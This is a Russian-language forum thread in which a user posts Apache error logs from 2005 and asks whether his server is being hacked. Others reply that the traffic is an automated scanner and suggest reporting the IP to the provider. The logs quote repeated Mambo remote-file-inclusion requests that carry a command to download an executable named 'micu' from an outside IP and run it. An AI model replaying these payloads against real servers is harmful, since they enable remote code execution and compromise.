че за

[Trojan]

лошье мой апач хакает ?

Код:

[Thu Dec 22 16:18:51 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/blog/xmlrpc.php
[Thu Dec 22 16:18:52 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/blog/xmlsrv/xmlrpc.php
[Thu Dec 22 16:18:54 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/blogs/xmlsrv/xmlrpc.php
[Thu Dec 22 16:18:55 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/drupal/xmlrpc.php
[Thu Dec 22 16:18:56 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/phpgroupware/xmlrpc.php
[Thu Dec 22 16:18:57 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/wordpress/xmlrpc.php
[Thu Dec 22 16:19:00 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/xmlrpc/xmlrpc.php
[Thu Dec 22 16:19:01 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/xmlsrv/xmlrpc.php
[Thu Dec 22 16:49:51 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69 /micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 16:49:52 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/ micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 16:49:53 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo% 20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 16:49:54 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20 YYY;echo|  HTTP\\x01.1
[Thu Dec 22 16:49:55 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 16:49:56 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 16:52:30 2005] [error] [client 66.249.65.20] File does not exist: c:/program files/apache group/apache/htdocs/robots.txt
[Thu Dec 22 16:52:32 2005] [error] [client 217.25.87.159] File does not exist: c:/program files/apache group/apache/htdocs/ls
[Thu Dec 22 19:25:28 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69 /micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 19:25:31 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/ micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 19:25:34 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo% 20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 19:25:36 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20 YYY;echo|  HTTP\\x01.1
[Thu Dec 22 19:25:39 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
[Thu Dec 22 19:25:42 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1

у меня такого в помине не было. ни форумов нифига . скормный апач такой . чутьчуть файлов всяких :(

[The Lord of Oskom]

Это вообще чего такое то?-)

Поясни хоть

[Cinse]

бездарно хакают, надо сказать =)))
Похоже юзают какой-нибудь Xspider или что-то еще, достаточно взглянуть на интервал запросов - всяко не в ручную =)

ЗЫ
Пробей IP'шник и сдай прову этого юзера, приложи логи сервака =)

[old CTaPuKaH]

наш ответ Троянам.
Троянам - трояново :)
ПС: ну хакнули и чего? :) панику поднимать? ;)

[LoBZ1K]

что это за micu, интересно.

[Cinse]

судя по действиям, которые хотели сделать - либо троян либо шелл =)))

[Brodyaga]

фото вообще ничего не понял из топа ну ка автор объясни

[Trojan]

наш ответ Троянам.
Троянам - трояново :)
ПС: ну хакнули и чего? :) панику поднимать? ;)

хакалка маленькая мой апач хакнуть ! задолбали эти нубы ! ваще трафик гонят только епть !!

[Trojan]

фото вообще ничего не понял из топа :) ну ка автор объясни :)

пытаются меня хакнуть ! :( дешевыми методами.

[Bonik]

Да не понтуйся, обычные, вполне жизненные методы.

[Trojan]

ха. не прошли ведь )

[LoBZ1K]

так и ломать то пытались через какие-то стандартные дырки по типу пхп-нюк или форумов. вряд ли даж в ручную смотрели, авторутер банальный. были бы установлены - сломали. так что гордиться нечем

[old CTaPuKaH]

так что гордиться нечем :)

вот и я про что.. а паники-то сколько? ;)

[ФЫМ]

а паники-то сколько?

Че вы пацану кайф ломаете а ? Злыдни...